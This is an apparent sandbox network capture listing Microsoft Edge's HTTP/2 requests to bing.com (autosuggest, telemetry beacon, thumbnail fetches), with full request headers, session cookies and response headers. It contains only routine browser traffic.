GET /AS/Suggestions?pt=page.serp&bq=onjon&mkt=en-gb&qry=da&cp=2&csr=1&msbqf=false&pths=1&cvid=6AB2CD56EF6C4338BF41C655438BDF1B HTTP/2.0
host: www.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-ch-ua-arch: "x86"
x-autosuggest-contentwidth: 976
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: */*
sec-fetch-site: same-origin
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/search?q=onjon&cvid=00ce9ee6199e4a5db1785c0696c690a3&aqs=edge.0.69i59j0l6.4970j0j4&FORM=ANAB01&PC=U531
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=288EEA9122C96A183944FFDA23616B9B
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=86884DE4C7964E9A8BDF2F6863E1FF8B&dmnchg=1
cookie: ak_bmsc=C2D6CC7390497BE1C01A7BFEDAA18236~000000000000000000000000000000~YAAQTTZ6XK2lT4iTAQAAn0QkkRprrpEhidRPBlBXEcq8yXcQA38uSNH+ETI0p/joh63w8poJaEkImLtdkLQg8/EeLnQEniFB9fWF6SoaVQIe5KSkFXprxWQ2pPBqq4I/D8YUJESQlK5QsHtLEcoDa3PnqsWEe4q04YjAJKxbTxs0IdENu3Ld3ZyU869Npt04Lj9uftmD82DOpCZZcnpaDM4NBczrWREbkwrmeCs/ZuQXeM4XhAbOZHWkHjyu4H+GFDVAyjbVFkVyMbaSsF/P9N6v2MiSZ4+HmkRq2NZ1SNJgeOjkaVuYIAwyvjJ7QYRpXBApJmvKrMqFG7BN/DQyPkYVcg40LPlKN3+Isi4ZjbcX1uRj2w4N+sXFrnRlWJZeLyIYFyoQVmRR
cookie: MUIDB=288EEA9122C96A183944FFDA23616B9B
cookie: SRCHUSR=DOB=20241204&T=1733306893000
cookie: _Rwho=u=d&ts=2024-12-04
cookie: ipv6=hit=1733310488290&t=4
cookie: BCP=AD=0&AL=0&SM=0
cookie: _RwBf=r=0&ilt=2&ihpd=0&ispd=2&rc=6&rb=0&gb=0&rg=200&pc=3&mtu=0&rbb=0&g=0&cid=&clo=0&v=2&l=2024-12-04T08:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-12-04T10:08:49.6106115+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _SS=PC=U531&SID=1389AFCAD5F46BB6263EBA81D45C6A43&R=6&RB=0&GB=0&RG=200&RP=3
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3772&DPR=1.0&UTC=0&PV=10.0&EXLTT=2&HV=1733306921&WTS=63868903693&PRVCW=1280&PRVCH=601
cookie: USRLOC=HS=1&ELOC=LAT=51.519901275634766|LON=-0.10880059748888016|N=London%2C%20Greater%20London|ELT=1|&BLOCK=TS=241204100849
cookie: _EDGE_S=F=1&SID=1389AFCAD5F46BB6263EBA81D45C6A43&mkt=en-gb

Response

HTTP/2.0 200

cache-control: public, max-age=2592000
content-type: image/jpeg
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QWthbWFp"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
content-length: 5913
date: Wed, 04 Dec 2024 10:08:56 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.4d367a5c.1733306936.7f1d035
GET

https://www.bing.com/fd/ls/l?IG=6AB2CD56EF6C4338BF41C655438BDF1B&TYPE=Event.ClientInst&DATA=%5B%7B%22Meta%22%3A%22q%3Ad%2Ci%3A3%22%2C%22T%22%3A%22CI.Request%22%2C%22TS%22%3A1733306927199%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Ad%2Ci%3A3%22%2C%22AsResponseLength%22%3A%221476%22%2C%22T%22%3A%22CI.Load%22%2C%22TS%22%3A1733306927294%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Ad%2Ci%3A3%2Cig%3AD04BF9B920AA4D47B11E05BB4BD13DC3%22%2C%22AnswerInfo%22%3A%22MB%3B10%22%2C%22T%22%3A%22CI.Show%22%2C%22TS%22%3A1733306927295%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Ad%2Ci%3A3%22%2C%22T%22%3A%22CI.GhostingLatency%22%2C%22TS%22%3A1733306927298%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Namespace%22%3A%22AutoSuggest%22%2C%22EventType%22%3A%22TextGhostingSuggest%22%2C%22CustomData%22%3A%22%7B%5C%22PL%5C%22%3A1%2C%20%5C%22GL%5C%22%3A9%2C%20%5C%22IG%5C%22%3A%5C%22D04BF9B920AA4D47B11E05BB4BD13DC3%5C%22%7D%22%2C%22T%22%3A%22CI.SystemEvent%22%2C%22TS%22%3A1733306927298%2C%22Name%22%3A%22Ghosting%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Ada%2Ci%3A4%22%2C%22T%22%3A%22CI.Change%22%2C%22TS%22%3A1733306927706%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Namespace%22%3A%22AutoSuggest%22%2C%22EventType%22%3A%22TextGhostingSuggest%22%2C%22CustomData%22%3A%22%7B%5C%22PL%5C%22%3A2%2C%20%5C%22GL%5C%22%3A8%2C%20%5C%22IG%5C%22%3A%5C%22D04BF9B920AA4D47B11E05BB4BD13DC3%5C%22%7D%22%2C%22T%22%3A%22CI.SystemEvent%22%2C%22TS%22%3A1733306927706%2C%22Name%22%3A%22Ghosting%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Ada%2Ci%3A4%22%2C%22T%22%3A%22CI.Request%22%2C%22TS%22%3A1733306927731%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Ada%2Ci%3A4%22%2C%22AsResponseLength%22%3A%221278%22%2C%22T%22%3A%22CI.Load%22%2C%22TS%22%3A1733306927816%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%5D

msedge.exe

Remote address:

95.101.143.203:443

Request

GET /fd/ls/l?IG=6AB2CD56EF6C4338BF41C655438BDF1B&TYPE=Event.ClientInst&DATA=%5B%7B%22Meta%22%3A%22q%3Ad%2Ci%3A3%22%2C%22T%22%3A%22CI.Request%22%2C%22TS%22%3A1733306927199%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Ad%2Ci%3A3%22%2C%22AsResponseLength%22%3A%221476%22%2C%22T%22%3A%22CI.Load%22%2C%22TS%22%3A1733306927294%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Ad%2Ci%3A3%2Cig%3AD04BF9B920AA4D47B11E05BB4BD13DC3%22%2C%22AnswerInfo%22%3A%22MB%3B10%22%2C%22T%22%3A%22CI.Show%22%2C%22TS%22%3A1733306927295%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Ad%2Ci%3A3%22%2C%22T%22%3A%22CI.GhostingLatency%22%2C%22TS%22%3A1733306927298%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Namespace%22%3A%22AutoSuggest%22%2C%22EventType%22%3A%22TextGhostingSuggest%22%2C%22CustomData%22%3A%22%7B%5C%22PL%5C%22%3A1%2C%20%5C%22GL%5C%22%3A9%2C%20%5C%22IG%5C%22%3A%5C%22D04BF9B920AA4D47B11E05BB4BD13DC3%5C%22%7D%22%2C%22T%22%3A%22CI.SystemEvent%22%2C%22TS%22%3A1733306927298%2C%22Name%22%3A%22Ghosting%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Ada%2Ci%3A4%22%2C%22T%22%3A%22CI.Change%22%2C%22TS%22%3A1733306927706%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Namespace%22%3A%22AutoSuggest%22%2C%22EventType%22%3A%22TextGhostingSuggest%22%2C%22CustomData%22%3A%22%7B%5C%22PL%5C%22%3A2%2C%20%5C%22GL%5C%22%3A8%2C%20%5C%22IG%5C%22%3A%5C%22D04BF9B920AA4D47B11E05BB4BD13DC3%5C%22%7D%22%2C%22T%22%3A%22CI.SystemEvent%22%2C%22TS%22%3A1733306927706%2C%22Name%22%3A%22Ghosting%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Ada%2Ci%3A4%22%2C%22T%22%3A%22CI.Request%22%2C%22TS%22%3A1733306927731%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Ada%2Ci%3A4%22%2C%22AsResponseLength%22%3A%221278%22%2C%22T%22%3A%22CI.Load%22%2C%22TS%22%3A1733306927816%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%5D HTTP/2.0
host: www.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/search?q=onjon&cvid=00ce9ee6199e4a5db1785c0696c690a3&aqs=edge.0.69i59j0l6.4970j0j4&FORM=ANAB01&PC=U531
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=288EEA9122C96A183944FFDA23616B9B
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=86884DE4C7964E9A8BDF2F6863E1FF8B&dmnchg=1
cookie: ak_bmsc=C2D6CC7390497BE1C01A7BFEDAA18236~000000000000000000000000000000~YAAQTTZ6XK2lT4iTAQAAn0QkkRprrpEhidRPBlBXEcq8yXcQA38uSNH+ETI0p/joh63w8poJaEkImLtdkLQg8/EeLnQEniFB9fWF6SoaVQIe5KSkFXprxWQ2pPBqq4I/D8YUJESQlK5QsHtLEcoDa3PnqsWEe4q04YjAJKxbTxs0IdENu3Ld3ZyU869Npt04Lj9uftmD82DOpCZZcnpaDM4NBczrWREbkwrmeCs/ZuQXeM4XhAbOZHWkHjyu4H+GFDVAyjbVFkVyMbaSsF/P9N6v2MiSZ4+HmkRq2NZ1SNJgeOjkaVuYIAwyvjJ7QYRpXBApJmvKrMqFG7BN/DQyPkYVcg40LPlKN3+Isi4ZjbcX1uRj2w4N+sXFrnRlWJZeLyIYFyoQVmRR
cookie: MUIDB=288EEA9122C96A183944FFDA23616B9B
cookie: SRCHUSR=DOB=20241204&T=1733306893000
cookie: _Rwho=u=d&ts=2024-12-04
cookie: ipv6=hit=1733310488290&t=4
cookie: BCP=AD=0&AL=0&SM=0
cookie: _RwBf=r=0&ilt=2&ihpd=0&ispd=2&rc=6&rb=0&gb=0&rg=200&pc=3&mtu=0&rbb=0&g=0&cid=&clo=0&v=2&l=2024-12-04T08:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-12-04T10:08:49.6106115+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _SS=PC=U531&SID=1389AFCAD5F46BB6263EBA81D45C6A43&R=6&RB=0&GB=0&RG=200&RP=3
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3772&DPR=1.0&UTC=0&PV=10.0&EXLTT=2&HV=1733306921&WTS=63868903693&PRVCW=1280&PRVCH=601
cookie: USRLOC=HS=1&ELOC=LAT=51.519901275634766|LON=-0.10880059748888016|N=London%2C%20Greater%20London|ELT=1|&BLOCK=TS=241204100849
cookie: _EDGE_S=F=1&SID=1389AFCAD5F46BB6263EBA81D45C6A43&mkt=en-gb

Response

HTTP/2.0 200

cache-control: public, max-age=2592000
content-type: image/jpeg
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QWthbWFp"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
content-length: 5704
date: Wed, 04 Dec 2024 10:08:56 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.4d367a5c.1733306936.7f1d037
GET

https://www.bing.com/th?id=OSK.TB_XMKsGXNkRt3-e-r9aXkgDhk10lDHn0oVh3wXCgaU&w=120&h=120&qlt=90&c=6&rs=1&cdv=1&pid=RS

msedge.exe

Remote address:

95.101.143.203:443

Request

GET /th?id=OSK.TB_XMKsGXNkRt3-e-r9aXkgDhk10lDHn0oVh3wXCgaU&w=120&h=120&qlt=90&c=6&rs=1&cdv=1&pid=RS HTTP/2.0
host: www.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/search?q=onjon&cvid=00ce9ee6199e4a5db1785c0696c690a3&aqs=edge.0.69i59j0l6.4970j0j4&FORM=ANAB01&PC=U531
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=288EEA9122C96A183944FFDA23616B9B
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=86884DE4C7964E9A8BDF2F6863E1FF8B&dmnchg=1
cookie: ak_bmsc=C2D6CC7390497BE1C01A7BFEDAA18236~000000000000000000000000000000~YAAQTTZ6XK2lT4iTAQAAn0QkkRprrpEhidRPBlBXEcq8yXcQA38uSNH+ETI0p/joh63w8poJaEkImLtdkLQg8/EeLnQEniFB9fWF6SoaVQIe5KSkFXprxWQ2pPBqq4I/D8YUJESQlK5QsHtLEcoDa3PnqsWEe4q04YjAJKxbTxs0IdENu3Ld3ZyU869Npt04Lj9uftmD82DOpCZZcnpaDM4NBczrWREbkwrmeCs/ZuQXeM4XhAbOZHWkHjyu4H+GFDVAyjbVFkVyMbaSsF/P9N6v2MiSZ4+HmkRq2NZ1SNJgeOjkaVuYIAwyvjJ7QYRpXBApJmvKrMqFG7BN/DQyPkYVcg40LPlKN3+Isi4ZjbcX1uRj2w4N+sXFrnRlWJZeLyIYFyoQVmRR
cookie: MUIDB=288EEA9122C96A183944FFDA23616B9B
cookie: SRCHUSR=DOB=20241204&T=1733306893000
cookie: _Rwho=u=d&ts=2024-12-04
cookie: ipv6=hit=1733310488290&t=4
cookie: BCP=AD=0&AL=0&SM=0
cookie: _RwBf=r=0&ilt=2&ihpd=0&ispd=2&rc=6&rb=0&gb=0&rg=200&pc=3&mtu=0&rbb=0&g=0&cid=&clo=0&v=2&l=2024-12-04T08:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-12-04T10:08:49.6106115+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _SS=PC=U531&SID=1389AFCAD5F46BB6263EBA81D45C6A43&R=6&RB=0&GB=0&RG=200&RP=3
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3772&DPR=1.0&UTC=0&PV=10.0&EXLTT=2&HV=1733306921&WTS=63868903693&PRVCW=1280&PRVCH=601
cookie: USRLOC=HS=1&ELOC=LAT=51.519901275634766|LON=-0.10880059748888016|N=London%2C%20Greater%20London|ELT=1|&BLOCK=TS=241204100849
cookie: _EDGE_S=F=1&SID=1389AFCAD5F46BB6263EBA81D45C6A43&mkt=en-gb

Response

HTTP/2.0 200

cache-control: public, max-age=2592000
content-type: image/jpeg
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QWthbWFp"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
content-length: 2846
date: Wed, 04 Dec 2024 10:08:56 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.4d367a5c.1733306936.7f1d036
GET

https://www.bing.com/th?id=OSK.7cc66daae606f2031c0d35f439eb13e8&w=120&h=120&qlt=90&c=6&rs=1&cdv=1&pid=RS

msedge.exe

Remote address:

95.101.143.203:443

Request

GET /th?id=OSK.7cc66daae606f2031c0d35f439eb13e8&w=120&h=120&qlt=90&c=6&rs=1&cdv=1&pid=RS HTTP/2.0
host: www.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/search?q=onjon&cvid=00ce9ee6199e4a5db1785c0696c690a3&aqs=edge.0.69i59j0l6.4970j0j4&FORM=ANAB01&PC=U531
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=288EEA9122C96A183944FFDA23616B9B
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=86884DE4C7964E9A8BDF2F6863E1FF8B&dmnchg=1
cookie: ak_bmsc=C2D6CC7390497BE1C01A7BFEDAA18236~000000000000000000000000000000~YAAQTTZ6XK2lT4iTAQAAn0QkkRprrpEhidRPBlBXEcq8yXcQA38uSNH+ETI0p/joh63w8poJaEkImLtdkLQg8/EeLnQEniFB9fWF6SoaVQIe5KSkFXprxWQ2pPBqq4I/D8YUJESQlK5QsHtLEcoDa3PnqsWEe4q04YjAJKxbTxs0IdENu3Ld3ZyU869Npt04Lj9uftmD82DOpCZZcnpaDM4NBczrWREbkwrmeCs/ZuQXeM4XhAbOZHWkHjyu4H+GFDVAyjbVFkVyMbaSsF/P9N6v2MiSZ4+HmkRq2NZ1SNJgeOjkaVuYIAwyvjJ7QYRpXBApJmvKrMqFG7BN/DQyPkYVcg40LPlKN3+Isi4ZjbcX1uRj2w4N+sXFrnRlWJZeLyIYFyoQVmRR
cookie: MUIDB=288EEA9122C96A183944FFDA23616B9B
cookie: SRCHUSR=DOB=20241204&T=1733306893000
cookie: _Rwho=u=d&ts=2024-12-04
cookie: ipv6=hit=1733310488290&t=4
cookie: BCP=AD=0&AL=0&SM=0
cookie: _RwBf=r=0&ilt=2&ihpd=0&ispd=2&rc=6&rb=0&gb=0&rg=200&pc=3&mtu=0&rbb=0&g=0&cid=&clo=0&v=2&l=2024-12-04T08:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-12-04T10:08:49.6106115+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _SS=PC=U531&SID=1389AFCAD5F46BB6263EBA81D45C6A43&R=6&RB=0&GB=0&RG=200&RP=3
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3772&DPR=1.0&UTC=0&PV=10.0&EXLTT=2&HV=1733306921&WTS=63868903693&PRVCW=1280&PRVCH=601
cookie: USRLOC=HS=1&ELOC=LAT=51.519901275634766|LON=-0.10880059748888016|N=London%2C%20Greater%20London|ELT=1|&BLOCK=TS=241204100849
cookie: _EDGE_S=F=1&SID=1389AFCAD5F46BB6263EBA81D45C6A43&mkt=en-gb

Response

HTTP/2.0 200

content-length: 0
access-control-allow-origin: *
date: Wed, 04 Dec 2024 10:08:56 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.4d367a5c.1733306936.7f1d023
GET

https://www.bing.com/th?id=OSK.xXWYzOYGpFi-ELg3MCHjGSN05vc-J1XBfcGhQlgMcbI&w=120&h=120&qlt=90&c=6&rs=1&cdv=1&pid=RS

msedge.exe

Remote address:

95.101.143.203:443

Request

GET /th?id=OSK.xXWYzOYGpFi-ELg3MCHjGSN05vc-J1XBfcGhQlgMcbI&w=120&h=120&qlt=90&c=6&rs=1&cdv=1&pid=RS HTTP/2.0
host: www.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/search?q=onjon&cvid=00ce9ee6199e4a5db1785c0696c690a3&aqs=edge.0.69i59j0l6.4970j0j4&FORM=ANAB01&PC=U531
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=288EEA9122C96A183944FFDA23616B9B
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=86884DE4C7964E9A8BDF2F6863E1FF8B&dmnchg=1
cookie: ak_bmsc=C2D6CC7390497BE1C01A7BFEDAA18236~000000000000000000000000000000~YAAQTTZ6XK2lT4iTAQAAn0QkkRprrpEhidRPBlBXEcq8yXcQA38uSNH+ETI0p/joh63w8poJaEkImLtdkLQg8/EeLnQEniFB9fWF6SoaVQIe5KSkFXprxWQ2pPBqq4I/D8YUJESQlK5QsHtLEcoDa3PnqsWEe4q04YjAJKxbTxs0IdENu3Ld3ZyU869Npt04Lj9uftmD82DOpCZZcnpaDM4NBczrWREbkwrmeCs/ZuQXeM4XhAbOZHWkHjyu4H+GFDVAyjbVFkVyMbaSsF/P9N6v2MiSZ4+HmkRq2NZ1SNJgeOjkaVuYIAwyvjJ7QYRpXBApJmvKrMqFG7BN/DQyPkYVcg40LPlKN3+Isi4ZjbcX1uRj2w4N+sXFrnRlWJZeLyIYFyoQVmRR
cookie: MUIDB=288EEA9122C96A183944FFDA23616B9B
cookie: SRCHUSR=DOB=20241204&T=1733306893000
cookie: _Rwho=u=d&ts=2024-12-04
cookie: ipv6=hit=1733310488290&t=4
cookie: BCP=AD=0&AL=0&SM=0
cookie: _RwBf=r=0&ilt=2&ihpd=0&ispd=2&rc=6&rb=0&gb=0&rg=200&pc=3&mtu=0&rbb=0&g=0&cid=&clo=0&v=2&l=2024-12-04T08:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-12-04T10:08:49.6106115+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _SS=PC=U531&SID=1389AFCAD5F46BB6263EBA81D45C6A43&R=6&RB=0&GB=0&RG=200&RP=3
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3772&DPR=1.0&UTC=0&PV=10.0&EXLTT=2&HV=1733306921&WTS=63868903693&PRVCW=1280&PRVCH=601
cookie: USRLOC=HS=1&ELOC=LAT=51.519901275634766|LON=-0.10880059748888016|N=London%2C%20Greater%20London|ELT=1|&BLOCK=TS=241204100849
cookie: _EDGE_S=F=1&SID=1389AFCAD5F46BB6263EBA81D45C6A43&mkt=en-gb

Response

HTTP/2.0 200

content-length: 1434
content-type: application/json; charset=utf-8
cache-control: private, max-age=300
content-encoding: br
vary: Accept-Encoding
x-eventid: 67502a3906fd441ca4b059c0e951c423
x-as-setsessionmarket: en-gb
accept-ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, ECT, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
useragentreductionoptout: A7kgTC5xdZ2WIVGZEfb1hUoNuvjzOZX3VIV/BA6C18kQOOF50Q0D3oWoAm49k3BQImkujKILc7JmPysWk3CSjwUAAACMeyJvcmlnaW4iOiJodHRwczovL3d3dy5iaW5nLmNvbTo0NDMiLCJmZWF0dXJlIjoiU2VuZEZ1bGxVc2VyQWdlbnRBZnRlclJlZHVjdGlvbiIsImV4cGlyeSI6MTY4NDg4NjM5OSwiaXNTdWJkb21haW4iOnRydWUsImlzVGhpcmRQYXJ0eSI6dHJ1ZX0=
content-security-policy: script-src https: 'strict-dynamic' 'report-sample' 'wasm-unsafe-eval' 'nonce-ecLHOqzSCaighmR0thIwHy+Cp0upD94JMdZURyWZ8pI='; base-uri 'self';report-to csp-endpoint
report-to: {"group":"csp-endpoint","max_age":86400,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingcsp"}]}
p3p: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND"
date: Wed, 04 Dec 2024 10:08:57 GMT
set-cookie: _EDGE_S=F=1&SID=1389AFCAD5F46BB6263EBA81D45C6A43&mkt=en-gb; domain=.bing.com; path=/; HttpOnly
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.4d367a5c.1733306937.7f1d1a3
GET

https://www.bing.com/th?id=OSK.07efcfd24d7a9077363e003bb00b89a0&w=120&h=120&qlt=90&c=6&rs=1&cdv=1&pid=RS

msedge.exe

Remote address:

95.101.143.203:443

Request

GET /th?id=OSK.07efcfd24d7a9077363e003bb00b89a0&w=120&h=120&qlt=90&c=6&rs=1&cdv=1&pid=RS HTTP/2.0
host: www.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
